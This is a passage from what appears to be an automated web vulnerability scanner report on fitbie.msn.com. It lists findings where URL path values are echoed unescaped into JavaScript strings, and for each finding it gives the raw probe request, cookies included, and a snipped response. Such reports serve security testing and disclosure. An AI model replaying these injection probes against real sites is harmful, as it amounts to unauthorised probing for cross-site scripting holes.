Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:30 +0000
ETag: "1297607370-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:31 GMT
Date: Sun, 13 Feb 2011 14:29:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/fat-burning-workouts9871a';0661b3de472?destination=node%2Ffat-burning-workouts9871a';0661b3de472&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.17. http://fitbie.msn.com/meal-plan/lose-weight-400-calorie-meals [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/meal-plan/lose-weight-400-calorie-meals

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e17ae'%3bd1e8119ba81 was submitted in the REST URL parameter 2. This input was echoed as e17ae';d1e8119ba81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /meal-plan/lose-weight-400-calorie-mealse17ae'%3bd1e8119ba81 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:41 +0000
ETag: "1297607801-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:41 GMT
Date: Sun, 13 Feb 2011 14:36:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/lose-weight-400-calorie-mealse17ae';d1e8119ba81?destination=node%2Flose-weight-400-calorie-mealse17ae';d1e8119ba81&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.18. http://fitbie.msn.com/men/toughness-challenge [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/men/toughness-challenge

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 900d6'%3b86f84f9e572 was submitted in the REST URL parameter 2. This input was echoed as 900d6';86f84f9e572 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /men/toughness-challenge900d6'%3b86f84f9e572 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:38:01 +0000
ETag: "1297607881-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:38:01 GMT
Date: Sun, 13 Feb 2011 14:38:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/toughness-challenge900d6';86f84f9e572?destination=node%2Ftoughness-challenge900d6';86f84f9e572&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.19. http://fitbie.msn.com/misc/drupal.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be070'%3b5b4d8fa22b6 was submitted in the REST URL parameter 2. This input was echoed as be070';5b4d8fa22b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /misc/drupal.jsbe070'%3b5b4d8fa22b6?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:04 +0000
ETag: "1297606684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:05 GMT
Date: Sun, 13 Feb 2011 14:18:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/drupal.jsbe070';5b4d8fa22b6?destination=node%2Fdrupal.jsbe070';5b4d8fa22b6&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.20. http://fitbie.msn.com/misc/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/misc/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f964'%3bec2bdcccb09 was submitted in the REST URL parameter 2. This input was echoed as 8f964';ec2bdcccb09 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /misc/favicon.ico8f964'%3bec2bdcccb09 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; s_cc=true; s_sq=%5B%5BB%5D%5D; fsbstat=1; fsbrelated=%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%20title%3D%225%20Ways%20to%20Do%20Anything%20Better%22%3E5%20Ways%20to%20Do%20Anything%20Better%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/5-ways-do-anything-better%22%3E%3Cimg%20src%3D%22/sites/default/files/beet-roots-cutting-board-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%20title%3D%226%20Ways%20to%20Lose%20Weight%20Naturally%20Before%20Your%20Wedding%22%3E6%20Ways%20to%20Lose%20Weight%20Naturally%20Before...%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-ways-lose-weight-naturally-before-your-wedding%22%3E%3Cimg%20src%3D%22/sites/default/files/bride-slim-healthy-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%20title%3D%226%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%22%3E6%20Lamest%20Excuses%20for%20Not%20Losing%20Weight%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-lamest-excuses-not-losing-weight%22%3E%3Cimg%20src%3D%22/sites/default/files/guilty-chocolate-snack-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%20title%3D%228%20Ridiculously%20Cheap%20Healthy%20Foods%22%3E8%20Ridiculously%20Cheap%20Healthy%20Foods%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-ridiculously-cheap-healthy-foods%22%3E%3Cimg%20src%3D%22/sites/default/files/potatoes-assorted-th.jpg%22%20/%3E%3C/a%3E

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:04 +0000
ETag: "1297606684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:04 GMT
Date: Sun, 13 Feb 2011 14:18:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/favicon.ico8f964';ec2bdcccb09?destination=node%2Ffavicon.ico8f964';ec2bdcccb09&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.21. http://fitbie.msn.com/misc/progress.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/misc/progress.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62d8d'%3bc8e41c08d31 was submitted in the REST URL parameter 2. This input was echoed as 62d8d';c8e41c08d31 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /misc/progress.js62d8d'%3bc8e41c08d31?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:04 +0000
ETag: "1297606684-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:06 GMT
Date: Sun, 13 Feb 2011 14:18:06 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/progress.js62d8d';c8e41c08d31?destination=node%2Fprogress.js62d8d';c8e41c08d31&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.22. http://fitbie.msn.com/modules/node/node.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/modules/node/node.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf5cc'%3bd185d67b297 was submitted in the REST URL parameter 2. This input was echoed as bf5cc';d185d67b297 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /modules/nodebf5cc'%3bd185d67b297/node.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:17:59 +0000
ETag: "1297606679-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:17:59 GMT
Date: Sun, 13 Feb 2011 14:17:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/nodebf5cc';d185d67b297?destination=node%2Fnodebf5cc';d185d67b297&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.23. http://fitbie.msn.com/modules/system/defaults.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/modules/system/defaults.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b616'%3b7f3637daab was submitted in the REST URL parameter 2. This input was echoed as 6b616';7f3637daab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /modules/system6b616'%3b7f3637daab/defaults.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:02 +0000
ETag: "1297606682-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:03 GMT
Date: Sun, 13 Feb 2011 14:18:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/system6b616';7f3637daab?destination=node%2Fsystem6b616';7f3637daab&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.24. http://fitbie.msn.com/modules/system/system-menus.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload decf5'%3bf569e407f47 was submitted in the REST URL parameter 2. This input was echoed as decf5';f569e407f47 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /modules/systemdecf5'%3bf569e407f47/system-menus.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:03 +0000
ETag: "1297606683-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:04 GMT
Date: Sun, 13 Feb 2011 14:18:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/systemdecf5';f569e407f47?destination=node%2Fsystemdecf5';f569e407f47&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.25. http://fitbie.msn.com/modules/system/system.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/modules/system/system.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d10c9'%3baccde2a0003 was submitted in the REST URL parameter 2. This input was echoed as d10c9';accde2a0003 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /modules/systemd10c9'%3baccde2a0003/system.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:06 +0000
ETag: "1297606686-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:07 GMT
Date: Sun, 13 Feb 2011 14:18:07 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/systemd10c9';accde2a0003?destination=node%2Fsystemd10c9';accde2a0003&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.26. http://fitbie.msn.com/modules/taxonomy/taxonomy.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/modules/taxonomy/taxonomy.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f3c'%3b8d3626cc255 was submitted in the REST URL parameter 2. This input was echoed as f1f3c';8d3626cc255 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail
